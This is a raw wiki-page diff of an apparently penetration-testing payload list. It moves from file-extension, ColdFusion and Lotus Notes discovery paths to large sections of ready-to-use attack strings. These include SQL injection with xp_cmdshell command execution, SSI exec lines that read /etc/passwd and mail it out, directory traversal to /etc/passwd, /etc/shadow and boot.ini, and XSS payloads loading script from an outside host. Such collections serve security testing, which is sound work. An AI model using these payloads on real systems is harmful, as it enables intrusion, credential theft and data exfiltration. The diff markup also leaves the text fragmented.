.rpm
 +
.rte
 +
.rz
 +
.rzs
 +
.s00
 +
.s01
 +
.s02
 +
.s7z
 +
.sar
 +
.sdc
 +
.sdn
 +
.sea
 +
.sen
 +
.sfs
 +
.sfx
 +
.sh
 +
.shar
 +
.shk
 +
.shr
 +
.sit
 +
.sitx
 +
.spt
 +
.sqx
 +
.sqz
 +
.tar
 +
.tar.gz
 +
.tar.xz
 +
.taz
 +
.tbz
 +
.tbz2
 +
.tg
 +
.tgz
 +
.tlz
 +
.tlzma
 +
.txz
 +
.tz
 +
.uc2
 +
.uha
 +
.vem
 +
.vsi
 +
.wad
 +
.war
 +
.wot
 +
.xef
 +
.xez
 +
.xmcdz
 +
.xpi
 +
.xx
 +
.xz
 +
.y
 +
.yz
 +
.z
 +
.z01
 +
.z02
 +
.z03
 +
.z04
 +
.zap
 +
.zfsendtotarget
 +
.zip
 +
.zipx
 +
.zix
 +
.zoo
 +
.zpi
 +
.zz</pre>
 +
 +
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===
 +
<pre>
 +
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)
 +
 +
# creative commons
 +
 +
.3me
 +
.3pe
 +
.4dl
 +
.8xk
 +
.^^^
 +
.aao
 +
.ab2
 +
.aca
 +
.accdb
 +
.acf
 +
.acg
 +
.agd
 +
.an1
 +
.anme
 +
.arc
 +
.arh
 +
.ast
 +
.att
 +
.aw
 +
.bafl
 +
.bdf
 +
.bfx
 +
.bjo
 +
.bld
 +
.blg
 +
.btf
 +
.btif
 +
.btr
 +
.cct
 +
.cdb
 +
.cdd
 +
.cdf
 +
.cdp
 +
.cdr
 +
.chk
 +
.ckd
 +
.cl2
 +
.cl4
 +
.clb
 +
.clix
 +
.clm
 +
.cmbl
 +
.contact
 +
.cpi
 +
.cpmz
 +
.csv
 +
.cwz
 +
.cxt
 +
.daf
 +
.dat
 +
.data
 +
.db
 +
.dcf
 +
.ddt
 +
.dex
 +
.dif
 +
.dmsk
 +
.dnc
 +
.dpx
 +
.dsd
 +
.dt1
 +
.dt2
 +
.dta
 +
.e00
 +
.ec0
 +
.edf
 +
.eep
 +
.efx
 +
.enc
 +
.enw
 +
.epw
 +
.est
 +
.et
 +
.eta
 +
.ev3
 +
.exif
 +
.exp
 +
.fbl
 +
.fdb
 +
.fid
 +
.fol
 +
.gdb
 +
.gen
 +
.gnp
 +
.gpi
 +
.gpx
 +
.hcp
 +
.hdf
 +
.hmt
 +
.hsk
 +
.htg
 +
.id2
 +
.ii
 +
.img
 +
.ink
 +
.ins
 +
.irr
 +
.irx
 +
.iw
 +
.jdb
 +
.jnt
 +
.job
 +
.jrprint
 +
.kmz
 +
.lbx
 +
.lex
 +
.lgf
 +
.lgl
 +
.lib
 +
.liveupdate
 +
.lnt
 +
.lst
 +
.m
 +
.masseffectprofile
 +
.mat
 +
.mbb
 +
.mdb
 +
.mem
 +
.menc
 +
.met
 +
.mmf
 +
.mng
 +
.mpd
 +
.mpp
 +
.ms10
 +
.muf
 +
.mw
 +
.mwf
 +
.mwx
 +
.nc
 +
.ndx
 +
.nfo
 +
.not
 +
.ns2
 +
.ns3
 +
.ns4
 +
.ntx
 +
.numbers
 +
.ods
 +
.oeaccount
 +
.omcs
 +
.or2
 +
.or3
 +
.or4
 +
.or5
 +
.orx
 +
.out
 +
.ov2
 +
.ovf
 +
.paf
 +
.pbd
 +
.pcr
 +
.pdb
 +
.pdx
 +
.peb
 +
.pec
 +
.pfc
 +
.pis
 +
.pln
 +
.pnpt
 +
.pns
 +
.pnt
 +
.pos
 +
.postal
 +
.pps
 +
.ppsx
 +
.ppt
 +
.pptm
 +
.pptx
 +
.pre
 +
.prf
 +
.psa
 +
.psf
 +
.pst
 +
.ptz
 +
.q07
 +
.q3d
 +
.qbw
 +
.qdat
 +
.qdf
 +
.qfx
 +
.qpf
 +
.qpw
 +
.qsd
 +
.rcd
 +
.rdx
 +
.ref
 +
.rmuf
 +
.roi
 +
.rrt
 +
.rvt
 +
.rwg
 +
.saf
 +
.sam07
 +
.sbd
 +
.sbf
 +
.sbq
 +
.sbt
 +
.sdb
 +
.sdc
 +
.sdf
 +
.sds
 +
.ser
 +
.sgn
 +
.shs
 +
.skc
 +
.slk
 +
.sonic
 +
.soundpack
 +
.spo
 +
.sql
 +
.stf
 +
.stl
 +
.stm
 +
.sy3
 +
.t08
 +
.t09
 +
.t2
 +
.tax2009
 +
.tdl
 +
.tdt
 +
.te
 +
.teacher
 +
.tmw
 +
.tol
 +
.trk
 +
.trs
 +
.trx
 +
.tsv
 +
.uccapilog
 +
.ud
 +
.udeb
 +
.uds
 +
.update
 +
.uwl
 +
.val
 +
.vcf
 +
.vdb
 +
.vfs
 +
.vip
 +
.vle
 +
.vlg
 +
.vxml
 +
.w02
 +
.wab
 +
.wb1
 +
.wb3
 +
.wdq
 +
.wfd
 +
.wfm
 +
.windowslivecontact
 +
.wk1
 +
.wk2
 +
.wk3
 +
.wk4
 +
.wk5
 +
.wke
 +
.wks
 +
.wlmp
 +
.wpc
 +
.wpo
 +
.wq1
 +
.wq2
 +
.wtr
 +
.xbk
 +
.xdb
 +
.xds
 +
.xfd
 +
.xl
 +
.xlgc
 +
.xlr
 +
.xls
 +
.xlsx
 +
.xltm
 +
.xltx
 +
.xml
 +
.xmpz
 +
.xsl
 +
.xsn
 +
.xtm
 +
.xtp
 +
.xxd
 +
.{pb
 +
.~hm
 +
</pre>
 +
 +
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===
 +
<pre>
 +
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)
 +
 +
# creative commons
 +
 +
CFIDE/Administrator/
 +
CFIDE/Administrator/index.cfm
 +
CFIDE/Administrator/login.cfm
 +
CFIDE/Administrator/Application.cfm
 +
CFIDE/Application.cfm
 +
CFIDE/adminapi/
 +
CFIDE/adminapi/Application.cfm
 +
CFIDE/adminapi/administrator.cfc
 +
CFIDE/adminapi/base.cfc
 +
CFIDE/adminapi/customtags/
 +
CFIDE/adminapi/customtags/l10n.cfm
 +
CFIDE/adminapi/customtags/resources
 +
CFIDE/adminapi/customtags/resources/
 +
CFIDE/adminapi/datasource.cfc
 +
CFIDE/adminapi/debugging.cfc
 +
CFIDE/adminapi/eventgateway.cfc
 +
CFIDE/adminapi/extensions.cfc
 +
CFIDE/adminapi/mail.cfc
 +
CFIDE/adminapi/runtime.cfc
 +
CFIDE/adminapi/security.cfc
 +
CFIDE/adminapi/_datasource/
 +
CFIDE/adminapi/_datasource/formatjdbcurl.cfm
 +
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm
 +
CFIDE/adminapi/_datasource/geturldefaults.cfm
 +
CFIDE/adminapi/_datasource/setdsn.cfm
 +
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm
 +
CFIDE/adminapi/_datasource/setsldatasource.cfm
 +
CFIDE/classes/
 +
CFIDE/classes/cf-j2re-win.cab
 +
CFIDE/classes/cfapplets.jar
 +
CFIDE/classes/images
 +
CFIDE/componentutils/
 +
CFIDE/componentutils/Application.cfm
 +
CFIDE/componentutils/cfcexplorer.cfc
 +
CFIDE/componentutils/cfcexplorer_utils.cfm
 +
CFIDE/componentutils/componentdetail.cfm
 +
CFIDE/componentutils/componentdoc.cfm
 +
CFIDE/componentutils/componentlist.cfm
 +
CFIDE/componentutils/gatewaymenu
 +
CFIDE/componentutils/gatewaymenu/
 +
CFIDE/componentutils/gatewaymenu/menu.cfc
 +
CFIDE/componentutils/gatewaymenu/menunode.cfc
 +
CFIDE/componentutils/login.cfm
 +
CFIDE/componentutils/packagelist.cfm
 +
CFIDE/componentutils/utils.cfc
 +
CFIDE/componentutils/_component_cfcToHTML.cfm
 +
CFIDE/componentutils/_component_cfcToMCDL.cfm?
 +
CFIDE/componentutils/_component_style.cfm
 +
CFIDE/componentutils/_component_utils.cfm
 +
CFIDE/debug/
 +
CFIDE/debug/images/
 +
CFIDE/debug/includes/
 +
CFIDE/images/
 +
CFIDE/images/skins/
 +
CFIDE/install.cfm
 +
CFIDE/installers/
 +
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp
 +
CFIDE/installers/CFReportBuilderInstaller.exe
 +
CFIDE/probe.cfm
 +
CFIDE/scripts/
 +
CFIDE/scripts/css/
 +
CFIDE/scripts/xsl/
 +
CFIDE/wizards/
 +
CFIDE/wizards/common/
 +
CFIDE/wizards/common/utils.cfc</pre>
 +
 +
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===
 
<pre>
 
<pre>
 +
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)
 +
 +
# creative commons
 +
 +
OPTIONS
 +
GET
 +
HEAD
 +
POST
 +
PUT
 +
DELETE
 +
TRACE
 +
CONNECT
 +
PROPFIND
 +
PROPPATCH
 +
MKCOL
 +
COPY
 +
MOVE
 +
LOCK
 +
UNLOCK
 +
VERSION-CONTROL
 +
REPORT
 +
CHECKOUT
 +
CHECKIN
 +
UNCHECKOUT
 +
MKWORKSPACE
 +
UPDATE
 +
LABEL
 +
MERGE
 +
BASELINE-CONTROL
 +
MKACTIVITY
 +
ORDERPATCH
 +
ACL
 +
PATCH
 +
SEARCH
 +
ARBITRARY
 +
</pre>
 +
 +
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===
 +
<pre>/852566C90012664F
 +
/admin4.nsf
 +
/admin5.nsf
 +
/admin.nsf
 +
/agentrunner.nsf
 +
/alog.nsf
 +
/a_domlog.nsf
 +
/bookmark.nsf
 +
/busytime.nsf
 +
/catalog.nsf
 +
/certa.nsf
 +
/certlog.nsf
 +
/certsrv.nsf
 +
/chatlog.nsf
 +
/clbusy.nsf
 +
/cldbdir.nsf
 +
/clusta4.nsf
 +
/collect4.nsf
 +
/da.nsf
 +
/dba4.nsf
 +
/dclf.nsf
 +
/DEASAppDesign.nsf
 +
/DEASLog01.nsf
 +
/DEASLog02.nsf
 +
/DEASLog03.nsf
 +
/DEASLog04.nsf
 +
/DEASLog05.nsf
 +
/DEASLog.nsf
 +
/decsadm.nsf
 +
/decslog.nsf
 +
/DEESAdmin.nsf
 +
/dirassist.nsf
 +
/doladmin.nsf
 +
/domadmin.nsf
 +
/domcfg.nsf
 +
/domguide.nsf
 +
/domlog.nsf
 +
/dspug.nsf
 +
/events4.nsf
 +
/events5.nsf
 +
/events.nsf
 +
/event.nsf
 +
/homepage.nsf
 +
/iNotes/Forms5.nsf/$DefaultNav
 +
/jotter.nsf
 +
/leiadm.nsf
 +
/leilog.nsf
 +
/leivlt.nsf
 +
/log4a.nsf
 +
/log.nsf
 +
/l_domlog.nsf
 +
/mab.nsf
 +
/mail10.box
 +
/mail1.box
 +
/mail2.box
 +
/mail3.box
 +
/mail4.box
 +
/mail5.box
 +
/mail6.box
 +
/mail7.box
 +
/mail8.box
 +
/mail9.box
 +
/mail.box
 +
/msdwda.nsf
 +
/mtatbls.nsf
 +
/mtstore.nsf
 +
/names.nsf
 +
/nntppost.nsf
 +
/nntp/nd000001.nsf
 +
/nntp/nd000002.nsf
 +
/nntp/nd000003.nsf
 +
/ntsync45.nsf
 +
/perweb.nsf
 +
/qpadmin.nsf
 +
/quickplace/quickplace/main.nsf
 +
/reports.nsf
 +
/sample/siregw46.nsf
 +
/schema50.nsf
 +
/setupweb.nsf
 +
/setup.nsf
 +
/smbcfg.nsf
 +
/smconf.nsf
 +
/smency.nsf
 +
/smhelp.nsf
 +
/smmsg.nsf
 +
/smquar.nsf
 +
/smsolar.nsf
 +
/smtime.nsf
 +
/smtpibwq.nsf
 +
/smtpobwq.nsf
 +
/smtp.box
 +
/smtp.nsf
 +
/smvlog.nsf
 +
/srvnam.htm
 +
/statmail.nsf
 +
/statrep.nsf
 +
/stauths.nsf
 +
/stautht.nsf
 +
/stconfig.nsf
 +
/stconf.nsf
 +
/stdnaset.nsf
 +
/stdomino.nsf
 +
/stlog.nsf
 +
/streg.nsf
 +
/stsrc.nsf
 +
/userreg.nsf
 +
/vpuserinfo.nsf
 +
/webadmin.nsf
 +
/web.nsf
 +
/.nsf/../winnt/win.ini
 +
/?Open
 +
</pre>
  
 +
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===
 +
<pre>Statement
 
'sqlvuln
 
'sqlvuln
 
'+sqlvuln
 
'+sqlvuln
Line 11: Line 3,625:
 
(sqlvuln)
 
(sqlvuln)
 
a' or 1=1--
 
a' or 1=1--
a" or 1=1--
+
"a"" or 1=1--"
a" or "a" = "a
+
or a = a
 
a' or 'a' = 'a
 
a' or 'a' = 'a
 
1 or 1=1
 
1 or 1=1
Line 23: Line 3,637:
 
declare @s varchar(22) select @s =
 
declare @s varchar(22) select @s =
 
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
 
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (4000) select @q =
 
 
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
 
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
 
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
 
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
Line 39: Line 3,652:
 
23 OR 1=1
 
23 OR 1=1
 
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
 
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
 
+
'
</pre>
+
'%20or%20''='
 
+
'%20or%20'x'='x
=== SSI (Server Side Includes) Statements ===
+
%20or%20x=x
 
+
')%20or%20('x'='x
 +
0 or 1=1
 +
' or 0=0 --
 +
" or 0=0 --
 +
or 0=0 --
 +
' or 0=0 #
 +
or 0=0 #"
 +
or 0=0 #
 +
' or 1=1--
 +
" or 1=1--
 +
' or '1'='1'--
 +
' or 1 --'
 +
or 1=1--
 +
or%201=1
 +
or%201=1 --
 +
' or 1=1 or ''='
 +
or 1=1 or ""=
 +
' or a=a--
 +
or a=a
 +
') or ('a'='a
 +
) or (a=a
 +
hi or a=a
 +
hi or 1=1 --"
 +
hi' or 1=1 --
 +
hi' or 'a'='a
 +
hi') or ('a'='a
 +
"hi"") or (""a""=""a"
 +
'hi' or 'x'='x';
 +
@variable
 +
,@variable
 +
PRINT
 +
PRINT @@variable
 +
select
 +
insert
 +
as
 +
or
 +
procedure
 +
limit
 +
order by
 +
asc
 +
desc
 +
delete
 +
update
 +
distinct
 +
having
 +
truncate
 +
replace
 +
like
 +
handler
 +
bfilename
 +
' or username like '%
 +
' or uname like '%
 +
' or userid like '%
 +
' or uid like '%
 +
' or user like '%
 +
exec xp
 +
exec sp
 +
'; exec master..xp_cmdshell
 +
'; exec xp_regread
 +
t'exec master..xp_cmdshell 'nslookup www.google.com'--
 +
--sp_password
 +
\x27UNION SELECT
 +
' UNION SELECT
 +
' UNION ALL SELECT
 +
' or (EXISTS)
 +
' (select top 1
 +
'||UTL_HTTP.REQUEST
 +
1;SELECT%20*
 +
to_timestamp_tz
 +
tz_offset
 +
&lt;&gt;"'%;)(&amp;+
 +
'%20or%201=1
 +
%27%20or%201=1
 +
%20$(sleep%2050)
 +
%20'sleep%2050'
 +
char%4039%41%2b%40SELECT
 +
&amp;apos;%20OR
 +
'sqlattempt1
 +
(sqlattempt2)
 +
|
 +
%7C
 +
*|
 +
%2A%7C
 +
*(|(mail=*))
 +
%2A%28%7C%28mail%3D%2A%29%29
 +
*(|(objectclass=*))
 +
%2A%28%7C%28objectclass%3D%2A%29%29
 +
(
 +
%28
 +
)
 +
%29
 +
&amp;
 +
%26
 +
!
 +
%21
 +
' or 1=1 or ''='
 +
' or ''='
 +
x' or 1=1 or 'x'='y
 +
/
 +
//
 +
//*
 +
*/*
 +
a' or 3=3--
 +
"a"" or 3=3--"
 +
' or 3=3
 +
‘ or 3=3 --
 +
</pre>  
 +
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===
 
<pre>
 
<pre>
 +
# Some server side include statements
 +
# Florian Roth @4nc4p
  
<!--#exec cmd="/bin/ls /" --><br/>
+
&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;
<!--#exec cmd="cat /etc/passwd" --><br/>
+
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;
<!--#exec cmd="find / -name *.* -print" --><br/>
+
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/>
+
&lt;!--#exec cmd="mail Florian Roth @4nc4p &lt;mailto:Florian Roth @4nc4p&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;
 
 
 
</pre>
 
</pre>
  
 
+
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===
=== Directory Traversal Statements ===
+
<pre>Statement
 
 
<pre>
 
 
 
 
\..\WINDOWS\win.ini
 
\..\WINDOWS\win.ini
 
\..\..\WINDOWS\win.ini
 
\..\..\WINDOWS\win.ini
Line 123: Line 3,841:
 
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
 
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
 
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
 
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
 +
../../../../../../../../../../../../etc/hosts%00
 +
../../../../../../../../../../../../etc/hosts
 +
../../boot.ini
 +
/../../../../../../../../%2A
 +
../../../../../../../../../../../../etc/passwd%00
 +
../../../../../../../../../../../../etc/passwd
 +
../../../../../../../../../../../../etc/shadow%00
 +
../../../../../../../../../../../../etc/shadow
 +
/../../../../../../../../../../etc/passwd^^
 +
/../../../../../../../../../../etc/shadow^^
 +
/../../../../../../../../../../etc/passwd
 +
/../../../../../../../../../../etc/shadow
 +
/./././././././././././etc/passwd
 +
/./././././././././././etc/shadow
 +
\..\..\..\..\..\..\..\..\..\..\etc\passwd
 +
\..\..\..\..\..\..\..\..\..\..\etc\shadow
 +
..\..\..\..\..\..\..\..\..\..\etc\passwd
 +
..\..\..\..\..\..\..\..\..\..\etc\shadow
 +
/..\../..\../..\../..\../..\../..\../etc/passwd
 +
/..\../..\../..\../..\../..\../..\../etc/shadow
 +
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
 +
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
 +
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
 +
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
 +
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
 +
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
 +
%0a/bin/cat%20/etc/passwd
 +
%0a/bin/cat%20/etc/shadow
 +
%00/etc/passwd%00
 +
%00/etc/shadow%00
 +
%00../../../../../../etc/passwd
 +
%00../../../../../../etc/shadow
 +
/../../../../../../../../../../../etc/passwd%00.jpg
 +
/../../../../../../../../../../../etc/passwd%00.html
 +
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
 +
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
 +
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 +
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
 +
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
 +
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
 +
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
 +
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
 +
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;
 +
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;
 +
../../../../../../../../conf/server.xml
 +
/../../../../../../../../bin/id|
 +
C:/inetpub/wwwroot/global.asa
 +
C:\inetpub\wwwroot\global.asa
 +
C:/boot.ini
 +
C:\boot.ini
 +
../../../../../../../../../../../../localstart.asp%00
 +
../../../../../../../../../../../../localstart.asp
 +
../../../../../../../../../../../../boot.ini%00
 +
../../../../../../../../../../../../boot.ini
 +
/./././././././././././boot.ini
 +
/../../../../../../../../../../../boot.ini%00
 +
/../../../../../../../../../../../boot.ini
 +
/..\../..\../..\../..\../..\../..\../boot.ini
 +
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
 +
\..\..\..\..\..\..\..\..\..\..\boot.ini
 +
..\..\..\..\..\..\..\..\..\..\boot.ini%00
 +
..\..\..\..\..\..\..\..\..\..\boot.ini
 +
/../../../../../../../../../../../boot.ini%00.html
 +
/../../../../../../../../../../../boot.ini%00.jpg
 +
/.../.../.../.../.../
 +
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
 +
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
 +
</pre>
 +
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''
  
</pre>
+
=== XSS Discovery Statements ===
  
=== XSS Statements ===
+
Discovery Statements
 +
<pre># Discovery Statements (July 2007)
 +
# Statements used to cause exploitable errors
 +
# Florian Roth @4nc4p
  
<pre>
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
 +
'';!--"&lt;XSS&gt;=&amp;{()}
 +
</pre>  
  
<a href="javas&#99;ript&#35;[code]">
+
Common exploit code
<a href="javas&#99;ript&#35;[code]">
+
<pre># Best Statements (July 2007)
<div onmouseover="[code]">
+
# Statements covering 90% of all vulnerabilities
<img src="javascript:[code]">
+
# Florian Roth @4nc4p
<img dynsrc="javascript:[code]">
 
<input type="image" dynsrc="javascript:[code]">
 
<bgsound src="javascript:[code]">
 
&<script>[code]</script>
 
&{[code]};
 
<img src=&{[code]};>
 
<link rel="stylesheet" href="javascript:[code]">
 
<iframe src="vbscript:[code]">
 
<img src="mocha:[code]">
 
<img src="livescript:[code]">
 
<a href="about:<s&#99;ript>[code]</script>">
 
<meta http-equiv="refresh" content="0;url=javascript:[code]">
 
<body onload="[code]">
 
<div style="background-image: url(javascript:[code]);">
 
<div style="behaviour: url([link to code]);">
 
<div style="binding: url([link to code]);">
 
<div style="width: expression([code]);">
 
<style type="text/javascript">[code]</style>
 
<object classid="clsid:..." codebase="javascript:[code]">
 
<style><!--</style><script>[code]//--></script>
 
<![CDATA[<!--]]><script>[code]//--></script>
 
<!-- -- --><script>[code]</script><!-- -- -->
 
<<script>[code]</script>
 
<img src="blah"onmouseover="[code]">
 
<img src="blah>" onmouseover="[code]">
 
<xml src="javascript:[code]">
 
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
 
<div datafld="b" dataformatas="html" datasrc="#X"></div>
 
<a href="javas&#99;ript&#35;[code]">
 
<div onmouseover="[code]">
 
<img src="javascript:[code]">
 
<img dynsrc="javascript:[code]">
 
<input type="image" dynsrc="javascript:[code]">
 
<bgsound src="javascript:[code]">
 
&<script>[code]</script>
 
&{[code]};
 
<img src=&{[code]};>
 
<link rel="stylesheet" href="javascript:[code]">
 
<iframe src="vbscript:[code]">
 
<img src="mocha:[code]">
 
<img src="livescript:[code]">
 
<a href="about:<s&#99;ript>[code]</script>">
 
<meta http-equiv="refresh" content="0;url=javascript:[code]">
 
<body onload="[code]">
 
<div style="background-image: url(javascript:[code]);">
 
<div style="behaviour: url([link to code]);">
 
<div style="binding: url([link to code]);"> [Mozilla]
 
<div style="width: expression([code]);">
 
<style type="text/javascript">[code]</style>
 
<object classid="clsid:..." codebase="javascript:[code]">
 
<style><!--</style><script>[code]//--></script>
 
<![CDATA[<!--]]><script>[code]//--></script>
 
<!-- -- --><script>[code]</script><!-- -- -->
 
<<script>[code]</script>
 
<img src="blah"onmouseover="[code]">
 
<img src="blah>" onmouseover="[code]">
 
<xml src="javascript:[code]">
 
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
 
<div datafld="b" dataformatas="html" datasrc="#X"></div>
 
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
 
  
 +
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='
 +
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="
 +
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'
 +
'); alert('xss'); var x='
 +
\\'); alert(\'xss\');var x=\'
 +
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));
 
</pre>
 
</pre>
 +
 +
Full List - (Update: 11 August 2009 - Total Statements: 162)
 +
<pre># Full List (July 2007)
 +
# All Statements - Full List
 +
# Based on the XSS cheat sheet
 +
# http://ha.ckers.org/xss.html
 +
# Florian Roth @4nc4p
  
=== Format String Statements ===
+
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
 +
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"
 +
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
 +
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"
 +
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"
 +
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"
 +
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
 +
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
 +
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
 +
"&lt;IMG SRC=""jav"
 +
"ascript:alert('XSS');""&gt;"
 +
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"
 +
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"
 +
"&lt;IMG SRC="" &amp;#14;  javascript:alert('XSS');""&gt;"
 +
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"
 +
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"
 +
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;
 +
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
 +
"&lt;IMG SRC=""javascript:alert('XSS')"""
 +
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;
 +
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;
 +
"\"";alert('XSS');//"
 +
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"
 +
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"
 +
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"
 +
&lt;BODY ONLOAD=alert('XSS')&gt;
 +
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"
 +
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"
 +
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"
 +
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"
 +
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"
 +
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"
 +
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"
 +
